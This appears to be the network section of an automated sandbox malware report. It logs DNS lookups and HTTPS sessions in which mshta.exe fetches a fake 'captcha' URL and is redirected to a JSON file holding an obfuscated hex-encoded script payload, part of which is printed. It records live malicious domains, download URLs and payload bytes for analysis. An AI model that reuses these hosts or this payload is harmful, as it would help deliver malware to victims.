                                                                                                                                            Dec 21, 2024 20:15:33.167030096 CET49822443192.168.2.4172.67.151.193
                                                                                                                                            Dec 21, 2024 20:15:33.168797970 CET49822443192.168.2.4172.67.151.193
                                                                                                                                            Dec 21, 2024 20:15:33.168828964 CET44349822172.67.151.193192.168.2.4
                                                                                                                                            Dec 21, 2024 20:15:33.169075966 CET44349822172.67.151.193192.168.2.4
                                                                                                                                            Dec 21, 2024 20:15:33.170237064 CET49822443192.168.2.4172.67.151.193
                                                                                                                                            Dec 21, 2024 20:15:33.170366049 CET49822443192.168.2.4172.67.151.193
                                                                                                                                            Dec 21, 2024 20:15:33.170412064 CET44349822172.67.151.193192.168.2.4
                                                                                                                                            Dec 21, 2024 20:15:33.170474052 CET49822443192.168.2.4172.67.151.193
                                                                                                                                            Dec 21, 2024 20:15:33.170490026 CET44349822172.67.151.193192.168.2.4
                                                                                                                                            Dec 21, 2024 20:15:34.193500996 CET44349822172.67.151.193192.168.2.4
                                                                                                                                            Dec 21, 2024 20:15:34.193588972 CET44349822172.67.151.193192.168.2.4
                                                                                                                                            Dec 21, 2024 20:15:34.193757057 CET49822443192.168.2.4172.67.151.193
                                                                                                                                            Dec 21, 2024 20:15:34.193847895 CET49822443192.168.2.4172.67.151.193
                                                                                                                                            Dec 21, 2024 20:15:34.193887949 CET44349822172.67.151.193192.168.2.4
                                                                                                                                            Dec 21, 2024 20:15:34.210783958 CET49823443192.168.2.4172.67.151.193
                                                                                                                                            Dec 21, 2024 20:15:34.210850954 CET44349823172.67.151.193192.168.2.4
                                                                                                                                            Dec 21, 2024 20:15:34.210949898 CET49823443192.168.2.4172.67.151.193
                                                                                                                                            Dec 21, 2024 20:15:34.211215019 CET49823443192.168.2.4172.67.151.193
                                                                                                                                            Dec 21, 2024 20:15:34.211246014 CET44349823172.67.151.193192.168.2.4
                                                                                                                                            Dec 21, 2024 20:15:35.427196026 CET44349823172.67.151.193192.168.2.4
                                                                                                                                            Dec 21, 2024 20:15:35.427326918 CET49823443192.168.2.4172.67.151.193
                                                                                                                                            Dec 21, 2024 20:15:35.437727928 CET49823443192.168.2.4172.67.151.193
                                                                                                                                            Dec 21, 2024 20:15:35.437774897 CET44349823172.67.151.193192.168.2.4
                                                                                                                                            Dec 21, 2024 20:15:35.438127041 CET44349823172.67.151.193192.168.2.4
                                                                                                                                            Dec 21, 2024 20:15:35.443537951 CET49823443192.168.2.4172.67.151.193
                                                                                                                                            Dec 21, 2024 20:15:35.443648100 CET49823443192.168.2.4172.67.151.193
                                                                                                                                            Dec 21, 2024 20:15:35.443716049 CET44349823172.67.151.193192.168.2.4
                                                                                                                                            Dec 21, 2024 20:15:36.337104082 CET44349823172.67.151.193192.168.2.4
                                                                                                                                            Dec 21, 2024 20:15:36.337222099 CET44349823172.67.151.193192.168.2.4
                                                                                                                                            Dec 21, 2024 20:15:36.337302923 CET49823443192.168.2.4172.67.151.193
                                                                                                                                            Dec 21, 2024 20:15:36.337447882 CET49823443192.168.2.4172.67.151.193
                                                                                                                                            Dec 21, 2024 20:15:36.337487936 CET44349823172.67.151.193192.168.2.4
                                                                                                                                            Dec 21, 2024 20:15:36.410235882 CET49824443192.168.2.4172.67.151.193
                                                                                                                                            Dec 21, 2024 20:15:36.410262108 CET44349824172.67.151.193192.168.2.4
                                                                                                                                            Dec 21, 2024 20:15:36.410327911 CET49824443192.168.2.4172.67.151.193
                                                                                                                                            Dec 21, 2024 20:15:36.410645008 CET49824443192.168.2.4172.67.151.193
                                                                                                                                            Dec 21, 2024 20:15:36.410655975 CET44349824172.67.151.193192.168.2.4
                                                                                                                                            Dec 21, 2024 20:15:37.627789974 CET44349824172.67.151.193192.168.2.4
                                                                                                                                            Dec 21, 2024 20:15:37.627878904 CET49824443192.168.2.4172.67.151.193
                                                                                                                                            Dec 21, 2024 20:15:37.628967047 CET49824443192.168.2.4172.67.151.193
                                                                                                                                            Dec 21, 2024 20:15:37.628976107 CET44349824172.67.151.193192.168.2.4
                                                                                                                                            Dec 21, 2024 20:15:37.629295111 CET44349824172.67.151.193192.168.2.4
                                                                                                                                            Dec 21, 2024 20:15:37.630433083 CET49824443192.168.2.4172.67.151.193
                                                                                                                                            Dec 21, 2024 20:15:37.630620956 CET49824443192.168.2.4172.67.151.193
                                                                                                                                            Dec 21, 2024 20:15:37.630657911 CET44349824172.67.151.193192.168.2.4
                                                                                                                                            Dec 21, 2024 20:15:37.630718946 CET49824443192.168.2.4172.67.151.193
                                                                                                                                            Dec 21, 2024 20:15:37.630728006 CET44349824172.67.151.193192.168.2.4
                                                                                                                                            Dec 21, 2024 20:15:38.567540884 CET44349824172.67.151.193192.168.2.4
                                                                                                                                            Dec 21, 2024 20:15:38.567678928 CET44349824172.67.151.193192.168.2.4
                                                                                                                                            Dec 21, 2024 20:15:38.567739964 CET49824443192.168.2.4172.67.151.193
                                                                                                                                            Dec 21, 2024 20:15:38.567825079 CET49824443192.168.2.4172.67.151.193
                                                                                                                                            Dec 21, 2024 20:15:38.567847967 CET44349824172.67.151.193192.168.2.4
                                                                                                                                            Dec 21, 2024 20:15:38.702049017 CET49825443192.168.2.4172.67.151.193
                                                                                                                                            Dec 21, 2024 20:15:38.702085972 CET44349825172.67.151.193192.168.2.4
                                                                                                                                            Dec 21, 2024 20:15:38.702181101 CET49825443192.168.2.4172.67.151.193
                                                                                                                                            Dec 21, 2024 20:15:38.702409029 CET49825443192.168.2.4172.67.151.193
                                                                                                                                            Dec 21, 2024 20:15:38.702438116 CET44349825172.67.151.193192.168.2.4
                                                                                                                                            Dec 21, 2024 20:15:39.914529085 CET44349825172.67.151.193192.168.2.4
                                                                                                                                            Dec 21, 2024 20:15:39.914752007 CET49825443192.168.2.4172.67.151.193
                                                                                                                                            Dec 21, 2024 20:15:39.916285038 CET49825443192.168.2.4172.67.151.193
                                                                                                                                            Dec 21, 2024 20:15:39.916320086 CET44349825172.67.151.193192.168.2.4
                                                                                                                                            Dec 21, 2024 20:15:39.916668892 CET44349825172.67.151.193192.168.2.4
                                                                                                                                            Dec 21, 2024 20:15:39.917819023 CET49825443192.168.2.4172.67.151.193
                                                                                                                                            Dec 21, 2024 20:15:39.917905092 CET49825443192.168.2.4172.67.151.193
                                                                                                                                            Dec 21, 2024 20:15:39.917918921 CET44349825172.67.151.193192.168.2.4
                                                                                                                                            Dec 21, 2024 20:15:40.950326920 CET44349825172.67.151.193192.168.2.4
                                                                                                                                            Dec 21, 2024 20:15:40.950403929 CET44349825172.67.151.193192.168.2.4
                                                                                                                                            Dec 21, 2024 20:15:40.950484991 CET49825443192.168.2.4172.67.151.193
                                                                                                                                            Dec 21, 2024 20:15:40.950568914 CET49825443192.168.2.4172.67.151.193
                                                                                                                                            Dec 21, 2024 20:15:40.950589895 CET44349825172.67.151.193192.168.2.4
                                                                                                                                            Dec 21, 2024 20:15:41.038089037 CET49826443192.168.2.4172.67.151.193
                                                                                                                                            Dec 21, 2024 20:15:41.038120031 CET44349826172.67.151.193192.168.2.4
                                                                                                                                            Dec 21, 2024 20:15:41.038192034 CET49826443192.168.2.4172.67.151.193
                                                                                                                                            Dec 21, 2024 20:15:41.038530111 CET49826443192.168.2.4172.67.151.193
                                                                                                                                            Dec 21, 2024 20:15:41.038543940 CET44349826172.67.151.193192.168.2.4
                                                                                                                                            Dec 21, 2024 20:15:42.263993025 CET44349826172.67.151.193192.168.2.4
                                                                                                                                            Dec 21, 2024 20:15:42.264208078 CET49826443192.168.2.4172.67.151.193
                                                                                                                                            Dec 21, 2024 20:15:42.265300989 CET49826443192.168.2.4172.67.151.193
                                                                                                                                            Dec 21, 2024 20:15:42.265307903 CET44349826172.67.151.193192.168.2.4
                                                                                                                                            Dec 21, 2024 20:15:42.265625954 CET44349826172.67.151.193192.168.2.4
                                                                                                                                            Dec 21, 2024 20:15:42.267072916 CET49826443192.168.2.4172.67.151.193
                                                                                                                                            Dec 21, 2024 20:15:42.267167091 CET49826443192.168.2.4172.67.151.193
                                                                                                                                            Dec 21, 2024 20:15:42.267172098 CET44349826172.67.151.193192.168.2.4
                                                                                                                                            Dec 21, 2024 20:15:43.119682074 CET44349826172.67.151.193192.168.2.4
                                                                                                                                            Dec 21, 2024 20:15:43.119802952 CET44349826172.67.151.193192.168.2.4
                                                                                                                                            Dec 21, 2024 20:15:43.119868040 CET49826443192.168.2.4172.67.151.193
                                                                                                                                            Dec 21, 2024 20:15:43.132558107 CET49826443192.168.2.4172.67.151.193
                                                                                                                                            Dec 21, 2024 20:15:43.132574081 CET44349826172.67.151.193192.168.2.4
                                                                                                                                            Dec 21, 2024 20:15:43.143404961 CET49827443192.168.2.4172.67.151.193
                                                                                                                                            Dec 21, 2024 20:15:43.143500090 CET44349827172.67.151.193192.168.2.4
                                                                                                                                            Dec 21, 2024 20:15:43.143620014 CET49827443192.168.2.4172.67.151.193
                                                                                                                                            Dec 21, 2024 20:15:43.145097971 CET49827443192.168.2.4172.67.151.193
                                                                                                                                            Dec 21, 2024 20:15:43.145183086 CET44349827172.67.151.193192.168.2.4
                                                                                                                                            Dec 21, 2024 20:15:43.815217018 CET49827443192.168.2.4172.67.151.193

                                                                                                                                            UDP Packets

                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                            Dec 21, 2024 20:13:30.865228891 CET6083153192.168.2.41.1.1.1
                                                                                                                                            Dec 21, 2024 20:13:31.182138920 CET53608311.1.1.1192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:33.333019972 CET5845753192.168.2.41.1.1.1
                                                                                                                                            Dec 21, 2024 20:13:33.802750111 CET53584571.1.1.1192.168.2.4
                                                                                                                                            Dec 21, 2024 20:13:39.907743931 CET6438953192.168.2.41.1.1.1
                                                                                                                                            Dec 21, 2024 20:13:40.049917936 CET53643891.1.1.1192.168.2.4
                                                                                                                                            Dec 21, 2024 20:15:11.819442987 CET6046453192.168.2.41.1.1.1
                                                                                                                                            Dec 21, 2024 20:15:12.157332897 CET53604641.1.1.1192.168.2.4

                                                                                                                                            DNS Queries

                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                            Dec 21, 2024 20:13:30.865228891 CET192.168.2.41.1.1.10x9329Standard query (0)solve.fizq.netA (IP address)IN (0x0001)false
                                                                                                                                            Dec 21, 2024 20:13:33.333019972 CET192.168.2.41.1.1.10xb9fStandard query (0)atsukaa.thrivezest.orgA (IP address)IN (0x0001)false
                                                                                                                                            Dec 21, 2024 20:13:39.907743931 CET192.168.2.41.1.1.10x6078Standard query (0)atsuka.thrivezest.orgA (IP address)IN (0x0001)false
                                                                                                                                            Dec 21, 2024 20:15:11.819442987 CET192.168.2.41.1.1.10xe1e5Standard query (0)locketplyxx.clickA (IP address)IN (0x0001)false

                                                                                                                                            DNS Answers

                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                            Dec 21, 2024 20:13:31.182138920 CET1.1.1.1192.168.2.40x9329No error (0)solve.fizq.net172.67.131.114A (IP address)IN (0x0001)false
                                                                                                                                            Dec 21, 2024 20:13:31.182138920 CET1.1.1.1192.168.2.40x9329No error (0)solve.fizq.net104.21.4.10A (IP address)IN (0x0001)false
                                                                                                                                            Dec 21, 2024 20:13:33.802750111 CET1.1.1.1192.168.2.40xb9fNo error (0)atsukaa.thrivezest.org104.21.18.182A (IP address)IN (0x0001)false
                                                                                                                                            Dec 21, 2024 20:13:33.802750111 CET1.1.1.1192.168.2.40xb9fNo error (0)atsukaa.thrivezest.org172.67.183.27A (IP address)IN (0x0001)false
                                                                                                                                            Dec 21, 2024 20:13:40.049917936 CET1.1.1.1192.168.2.40x6078No error (0)atsuka.thrivezest.org172.67.183.27A (IP address)IN (0x0001)false
                                                                                                                                            Dec 21, 2024 20:13:40.049917936 CET1.1.1.1192.168.2.40x6078No error (0)atsuka.thrivezest.org104.21.18.182A (IP address)IN (0x0001)false
                                                                                                                                            Dec 21, 2024 20:15:12.157332897 CET1.1.1.1192.168.2.40xe1e5No error (0)locketplyxx.click172.67.151.193A (IP address)IN (0x0001)false
                                                                                                                                            Dec 21, 2024 20:15:12.157332897 CET1.1.1.1192.168.2.40xe1e5No error (0)locketplyxx.click104.21.88.181A (IP address)IN (0x0001)false

                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                            • solve.fizq.net
                                                                                                                                            • atsukaa.thrivezest.org
                                                                                                                                            • atsuka.thrivezest.org
                                                                                                                                            • locketplyxx.click

                                                                                                                                            HTTPS Proxied Packets

                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            0192.168.2.449732172.67.131.1144437356C:\Windows\SysWOW64\mshta.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-12-21 19:13:32 UTC311OUTGET /awjxs.captcha HTTP/1.1
                                                                                                                                            Accept: */*
                                                                                                                                            Accept-Language: en-CH
                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                            Host: solve.fizq.net
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            2024-12-21 19:13:33 UTC854INHTTP/1.1 302 Found
                                                                                                                                            Date: Sat, 21 Dec 2024 19:13:32 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Location: https://atsukaa.thrivezest.org/winwidgetshp.json
                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CfdPphW1zi5Acqx%2FZ7Nkmtd%2FdlbTSsWmOqH8aWWPFzlAOeE5YTa%2B7DdIDysuCbZZr1e5eGJVtxCtufOItY20UQiZx3p9yBeSpwyBftmdb1JjDzNPqD6Qe%2BpyM5Vi3bKxRA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 8f5a30a36d5b9e08-EWR
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1839&min_rtt=1822&rtt_var=718&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2815&recv_bytes=893&delivery_rate=1486761&cwnd=163&unsent_bytes=0&cid=24858acbb6f813a3&ts=693&x=0"
                                                                                                                                            2024-12-21 19:13:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                            Data Ascii: 0


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            1192.168.2.449733104.21.18.1824437356C:\Windows\SysWOW64\mshta.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-12-21 19:13:35 UTC323OUTGET /winwidgetshp.json HTTP/1.1
                                                                                                                                            Accept: */*
                                                                                                                                            Accept-Language: en-CH
                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Host: atsukaa.thrivezest.org
                                                                                                                                            2024-12-21 19:13:35 UTC919INHTTP/1.1 200 OK
                                                                                                                                            Date: Sat, 21 Dec 2024 19:13:35 GMT
                                                                                                                                            Content-Type: application/json
                                                                                                                                            Content-Length: 1446803
                                                                                                                                            Connection: close
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            ETag: "700edbf1e36cdbdc5b01bd20bd68abf2"
                                                                                                                                            Last-Modified: Fri, 20 Dec 2024 18:59:08 GMT
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zoEJ01t9Ja9Ksa%2B7Mcn%2BDdUmyLjKkXQlack3KevHfBwSZGT2Ie7YTuMgX1EJdDVdhLVIUZzRWc60lHeQYjOawp6W2EtS%2B0W%2FDHKfIjbAkHvZSvqNIFMMdZECbsXUvD8e7XMBnolK%2Btg4"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 8f5a30b39991ef9d-EWR
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1820&min_rtt=1788&rtt_var=735&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2870&recv_bytes=905&delivery_rate=1425781&cwnd=121&unsent_bytes=0&cid=6cceec8e805bd4ca&ts=594&x=0"
                                                                                                                                            2024-12-21 19:13:35 UTC1369INData Raw: 36 36 71 37 35 71 36 65 64 36 33 76 37 34 45 36 39 45 36 66 7a 36 65 42 32 30 4c 36 62 4a 36 63 4f 36 38 65 34 32 41 34 34 78 32 38 72 37 35 4a 37 32 49 34 39 66 35 31 69 34 38 68 36 33 6e 32 39 47 37 62 49 37 36 75 36 31 41 37 32 43 32 30 6b 34 37 64 36 32 49 36 31 41 34 35 68 35 38 6a 36 62 73 33 64 54 32 30 6b 32 37 4f 32 37 74 33 62 70 36 36 6e 36 66 42 37 32 66 32 30 64 32 38 56 37 36 45 36 31 67 37 32 4e 32 30 48 37 33 54 34 37 50 36 35 54 36 35 5a 36 37 6f 34 66 6b 32 30 67 33 64 55 32 30 6a 33 30 68 33 62 6a 37 33 76 34 37 42 36 35 55 36 35 56 36 37 73 34 66 4c 32 30 63 33 63 65 32 30 6c 37 35 68 37 32 4d 34 39 63 35 31 50 34 38 54 36 33 73 32 65 67 36 63 43 36 35 4b 36 65 6c 36 37 44 37 34 4e 36 38 6d 33 62 76 32 30 51 37 33 4f 34 37 70 36 35 61
                                                                                                                                            Data Ascii: 66q75q6ed63v74E69E6fz6eB20L6bJ6cO68e42A44x28r75J72I49f51i48h63n29G7bI76u61A72C20k47d62I61A45h58j6bs3dT20k27O27t3bp66n6fB72f20d28V76E61g72N20H73T47P65T65Z67o4fk20g3dU20j30h3bj73v47B65U65V67s4fL20c3ce20l75h72M49c51P48T63s2eg6cC65K6el67D74N68m3bv20Q73O47p65a
                                                                                                                                            2024-12-21 19:13:35 UTC1369INData Raw: 63 45 33 35 7a 33 32 6e 33 35 51 32 63 54 33 35 75 33 31 67 33 36 54 32 63 52 33 35 54 33 30 43 33 33 4d 32 63 70 33 35 50 33 31 54 33 38 64 32 63 76 33 35 6c 33 31 49 33 39 41 32 63 52 33 35 62 33 31 4a 33 36 69 32 63 61 33 35 73 33 31 55 33 32 48 32 63 45 33 34 6b 33 33 6b 33 34 68 32 63 71 33 34 6f 33 34 58 33 37 58 32 63 52 33 35 6e 33 31 45 33 37 6b 32 63 79 33 35 73 33 31 6a 33 34 51 32 63 59 33 35 6f 33 31 67 33 30 68 32 63 63 33 35 6d 33 30 69 33 37 58 32 63 76 33 35 4b 33 31 4f 33 38 63 32 63 70 33 34 45 33 33 70 33 34 62 32 63 5a 33 34 59 33 34 50 33 32 67 32 63 69 33 34 55 33 33 56 33 38 42 32 63 73 33 34 77 33 38 4d 33 30 49 32 63 68 33 34 59 33 38 43 33 32 5a 32 63 73 33 34 74 33 38 4a 33 34 6c 32 63 4c 33 34 6e 33 39 65 33 32 52 32 63 43 33
                                                                                                                                            Data Ascii: cE35z32n35Q2cT35u31g36T2cR35T30C33M2cp35P31T38d2cv35l31I39A2cR35b31J36i2ca35s31U32H2cE34k33k34h2cq34o34X37X2cR35n31E37k2cy35s31j34Q2cY35o31g30h2cc35m30i37X2cv35K31O38c2cp34E33p34b2cZ34Y34P32g2ci34U33V38B2cs34w38M30I2ch34Y38C32Z2cs34t38J34l2cL34n39e32R2cC3
                                                                                                                                            2024-12-21 19:13:35 UTC1369INData Raw: 72 33 34 4f 33 35 6b 33 31 42 32 63 66 33 34 71 33 36 4b 33 39 47 32 63 41 33 34 61 33 35 70 33 31 69 32 63 56 33 34 76 33 37 66 33 31 42 32 63 66 33 34 4e 33 35 67 33 31 7a 32 63 41 33 34 63 33 36 62 33 39 56 32 63 77 33 34 62 33 37 52 33 32 71 32 63 43 33 34 63 33 37 68 33 31 55 32 63 57 33 34 65 33 37 58 33 30 62 32 63 54 33 34 70 33 37 52 33 31 6b 32 63 61 33 34 63 33 37 73 33 32 6d 32 63 4c 33 34 6c 33 35 51 33 31 50 32 63 7a 33 34 71 33 37 65 33 32 64 32 63 61 33 34 45 33 35 74 33 36 4f 32 63 6d 33 34 4f 33 35 46 33 39 45 32 63 59 33 34 55 33 35 44 33 39 58 32 63 73 33 34 56 33 35 4c 33 36 72 32 63 59 33 34 44 33 35 69 33 36 70 32 63 76 33 34 77 33 36 5a 33 39 59 32 63 6a 33 34 70 33 35 4b 33 35 4b 32 63 4b 33 34 42 33 35 71 33 34 4d 32 63 79 33 34
                                                                                                                                            Data Ascii: r34O35k31B2cf34q36K39G2cA34a35p31i2cV34v37f31B2cf34N35g31z2cA34c36b39V2cw34b37R32q2cC34c37h31U2cW34e37X30b2cT34p37R31k2ca34c37s32m2cL34l35Q31P2cz34q37e32d2ca34E35t36O2cm34O35F39E2cY34U35D39X2cs34V35L36r2cY34D35i36p2cv34w36Z39Y2cj34p35K35K2cK34B35q34M2cy34
                                                                                                                                            2024-12-21 19:13:35 UTC1369INData Raw: 33 34 43 33 35 53 33 37 61 32 63 73 33 34 4d 33 35 52 33 31 57 32 63 4e 33 34 4f 33 35 71 33 33 6d 32 63 57 33 34 71 33 35 71 33 37 6a 32 63 74 33 34 4f 33 37 74 33 32 49 32 63 6b 33 34 51 33 35 68 33 32 4b 32 63 43 33 34 54 33 35 57 33 36 41 32 63 55 33 34 75 33 37 65 33 30 71 32 63 70 33 34 67 33 35 56 33 32 44 32 63 42 33 34 59 33 35 71 33 30 57 32 63 73 33 34 4a 33 35 54 33 32 72 32 63 41 33 34 42 33 35 78 33 36 50 32 63 61 33 34 72 33 35 58 33 33 55 32 63 64 33 34 72 33 35 49 33 35 6d 32 63 56 33 34 49 33 35 59 33 31 5a 32 63 70 33 34 52 33 35 43 33 31 54 32 63 6b 33 34 41 33 35 78 33 30 71 32 63 56 33 34 6d 33 35 69 33 32 55 32 63 58 33 34 58 33 35 50 33 38 61 32 63 78 33 34 70 33 35 4b 33 30 41 32 63 56 33 34 47 33 35 5a 33 31 63 32 63 57 33 34 4b
                                                                                                                                            Data Ascii: 34C35S37a2cs34M35R31W2cN34O35q33m2cW34q35q37j2ct34O37t32I2ck34Q35h32K2cC34T35W36A2cU34u37e30q2cp34g35V32D2cB34Y35q30W2cs34J35T32r2cA34B35x36P2ca34r35X33U2cd34r35I35m2cV34I35Y31Z2cp34R35C31T2ck34A35x30q2cV34m35i32U2cX34X35P38a2cx34p35K30A2cV34G35Z31c2cW34K
                                                                                                                                            2024-12-21 19:13:35 UTC1369INData Raw: 34 6e 33 36 50 33 38 76 32 63 49 33 34 51 33 36 49 33 39 78 32 63 64 33 34 45 33 37 78 33 31 47 32 63 52 33 34 6c 33 36 45 33 38 4a 32 63 4d 33 34 6c 33 35 74 33 34 70 32 63 55 33 34 5a 33 36 64 33 39 66 32 63 68 33 34 45 33 35 41 33 38 44 32 63 56 33 34 6b 33 35 68 33 39 6f 32 63 67 33 34 46 33 37 65 33 30 6b 32 63 70 33 34 69 33 35 77 33 30 74 32 63 6d 33 34 47 33 35 7a 33 30 74 32 63 72 33 34 69 33 35 6c 33 35 48 32 63 62 33 34 77 33 35 4d 33 30 62 32 63 74 33 34 44 33 35 6c 33 38 74 32 63 4a 33 34 6a 33 36 4e 33 38 45 32 63 51 33 34 46 33 35 62 33 30 73 32 63 58 33 34 4a 33 36 5a 33 38 4d 32 63 48 33 34 55 33 35 55 33 36 64 32 63 70 33 34 7a 33 35 44 33 38 4e 32 63 61 33 34 6b 33 35 6f 33 35 7a 32 63 54 33 34 74 33 35 62 33 34 5a 32 63 59 33 34 46 33
                                                                                                                                            Data Ascii: 4n36P38v2cI34Q36I39x2cd34E37x31G2cR34l36E38J2cM34l35t34p2cU34Z36d39f2ch34E35A38D2cV34k35h39o2cg34F37e30k2cp34i35w30t2cm34G35z30t2cr34i35l35H2cb34w35M30b2ct34D35l38t2cJ34j36N38E2cQ34F35b30s2cX34J36Z38M2cH34U35U36d2cp34z35D38N2ca34k35o35z2cT34t35b34Z2cY34F3
                                                                                                                                            2024-12-21 19:13:35 UTC1369INData Raw: 4f 33 35 4c 33 36 43 32 63 43 33 34 44 33 36 5a 33 38 76 32 63 43 33 34 61 33 36 4c 33 37 78 32 63 76 33 34 7a 33 36 54 33 37 72 32 63 75 33 34 45 33 35 78 33 33 78 32 63 69 33 34 42 33 35 4f 33 31 48 32 63 44 33 34 4f 33 35 68 33 32 76 32 63 56 33 34 46 33 35 72 33 36 58 32 63 50 33 34 6a 33 35 4a 33 33 41 32 63 6c 33 34 41 33 35 70 33 34 4b 32 63 73 33 34 43 33 35 73 33 32 56 32 63 6e 33 34 73 33 35 77 33 34 79 32 63 44 33 34 65 33 36 70 33 38 75 32 63 69 33 34 55 33 36 7a 33 38 4e 32 63 41 33 34 45 33 35 79 33 39 6f 32 63 56 33 34 64 33 37 5a 33 31 77 32 63 6a 33 34 6e 33 35 68 33 39 4d 32 63 71 33 34 53 33 35 46 33 33 74 32 63 4f 33 34 6e 33 36 45 33 37 67 32 63 4a 33 34 73 33 35 54 33 39 4c 32 63 52 33 34 69 33 36 73 33 39 71 32 63 51 33 34 77 33 37
                                                                                                                                            Data Ascii: O35L36C2cC34D36Z38v2cC34a36L37x2cv34z36T37r2cu34E35x33x2ci34B35O31H2cD34O35h32v2cV34F35r36X2cP34j35J33A2cl34A35p34K2cs34C35s32V2cn34s35w34y2cD34e36p38u2ci34U36z38N2cA34E35y39o2cV34d37Z31w2cj34n35h39M2cq34S35F33t2cO34n36E37g2cJ34s35T39L2cR34i36s39q2cQ34w37
                                                                                                                                            2024-12-21 19:13:35 UTC1369INData Raw: 33 35 6e 33 31 44 32 63 66 33 34 61 33 35 5a 33 33 48 32 63 71 33 34 50 33 37 75 33 31 48 32 63 61 33 34 42 33 36 6d 33 38 4b 32 63 56 33 34 67 33 37 50 33 30 54 32 63 43 33 34 79 33 35 63 33 33 4c 32 63 43 33 34 56 33 35 69 33 37 70 32 63 49 33 34 4c 33 37 79 33 32 71 32 63 47 33 34 74 33 37 54 33 31 66 32 63 55 33 34 41 33 35 4c 33 31 6e 32 63 4e 33 34 4e 33 35 6d 33 36 42 32 63 59 33 34 73 33 35 54 33 37 46 32 63 50 33 34 57 33 37 79 33 31 64 32 63 59 33 34 43 33 36 48 33 39 42 32 63 63 33 34 63 33 36 41 33 37 4a 32 63 73 33 34 6b 33 36 79 33 37 65 32 63 52 33 34 44 33 37 42 33 30 67 32 63 69 33 34 48 33 37 70 33 32 56 32 63 55 33 34 62 33 35 47 33 34 6f 32 63 4c 33 34 61 33 35 6d 33 32 4a 32 63 43 33 34 63 33 36 5a 33 37 6d 32 63 4e 33 34 56 33 35 53
                                                                                                                                            Data Ascii: 35n31D2cf34a35Z33H2cq34P37u31H2ca34B36m38K2cV34g37P30T2cC34y35c33L2cC34V35i37p2cI34L37y32q2cG34t37T31f2cU34A35L31n2cN34N35m36B2cY34s35T37F2cP34W37y31d2cY34C36H39B2cc34c36A37J2cs34k36y37e2cR34D37B30g2ci34H37p32V2cU34b35G34o2cL34a35m32J2cC34c36Z37m2cN34V35S
                                                                                                                                            2024-12-21 19:13:35 UTC1369INData Raw: 35 45 33 37 46 32 63 52 33 34 62 33 35 66 33 31 4e 32 63 65 33 34 77 33 35 79 33 33 6b 32 63 41 33 34 6e 33 35 75 33 33 59 32 63 63 33 34 63 33 35 42 33 33 48 32 63 52 33 34 41 33 35 58 33 31 4a 32 63 62 33 34 62 33 36 51 33 37 64 32 63 4f 33 34 67 33 37 75 33 32 4a 32 63 46 33 34 6e 33 37 43 33 31 46 32 63 43 33 34 75 33 35 4b 33 36 78 32 63 47 33 34 57 33 35 43 33 36 73 32 63 62 33 34 56 33 37 42 33 31 63 32 63 51 33 34 6e 33 35 77 33 31 6a 32 63 53 33 34 63 33 35 62 33 39 45 32 63 55 33 34 76 33 36 65 33 38 71 32 63 4b 33 34 42 33 37 79 33 32 78 32 63 42 33 34 70 33 37 65 33 30 4d 32 63 6b 33 34 6f 33 35 57 33 38 68 32 63 53 33 34 45 33 35 42 33 34 76 32 63 78 33 34 66 33 37 68 33 32 47 32 63 5a 33 34 6f 33 37 4d 33 32 61 32 63 6b 33 34 4b 33 35 72 33
                                                                                                                                            Data Ascii: 5E37F2cR34b35f31N2ce34w35y33k2cA34n35u33Y2cc34c35B33H2cR34A35X31J2cb34b36Q37d2cO34g37u32J2cF34n37C31F2cC34u35K36x2cG34W35C36s2cb34V37B31c2cQ34n35w31j2cS34c35b39E2cU34v36e38q2cK34B37y32x2cB34p37e30M2ck34o35W38h2cS34E35B34v2cx34f37h32G2cZ34o37M32a2ck34K35r3
